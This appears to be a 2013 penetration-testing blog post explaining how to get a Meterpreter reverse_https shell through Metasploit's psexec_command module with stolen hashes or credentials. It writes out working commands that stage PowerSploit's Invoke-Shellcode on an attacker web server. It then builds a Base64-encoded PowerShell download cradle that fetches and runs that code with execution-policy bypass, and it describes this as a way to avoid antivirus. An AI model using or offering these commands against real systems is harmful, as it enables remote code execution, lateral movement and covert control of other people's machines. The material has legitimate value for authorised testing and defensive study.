Metasploit has supported psexec-like functionality with pass-the-hash for several years. Unfortunately, its mostly useless when an AV product is there to delete the uploaded service binary. Recently, a module (/auxiliary/admin/smb/psexec_command) was created that allows you to run a single Windows command with discovered hashes or credentials. This doesn't flag AV, but isn't the full meterpreter shell that we're use to. How can we turn one command into a meterpreter shell? With PowerSploit and Matt Graeber's Invoke-Shellcode!
The basic steps:
Kali Linux is awesome, but the version of PowerSploit is currently outdated, so lets pull down the script we will eventually run:
wget -O /var/www/payload https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
Next we need to append the appropriate function call with LHOST and LPORT parameters and ensure that Apache is running.
echo "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force" >> /var/www/payload
strings -es /var/www/payload
strings -es /var/www/payload
Call to Function Added |
Basically, we are going to Base64 encode our short script block which will pull down the rest of our script:
scriptblock="iex (New-Object Net.WebClient).DownloadString("http://$lhost/payload")"encode="`echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0`"command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode"echo $command
Now we fill in the rest of the settings of the module (either a password or hash) and use the COMMAND parameter to the encoded command:
Add Command to psexec_command |
Next, we start the multi/handler with reverse_https:
Set Up Handler |
Get Your Shell |
As soon as the PTH-Suite is ported to Kali, I hope to show you how to accomplish all of this without writing anything to disk!
***Updated 8/8/2013
So after a few comments and working through encoding issues with several people I finally realized that the actual posted code was incomplete. Instead of working from the post, I continued to work from my own script which was just simply not smart. So I added a screenshot for extra clarity and I apologize to anyone that this frustrated. On the positive side, now there are loads of other ways to pull this off which I wrote about here and you can read more about here and here.
-Chris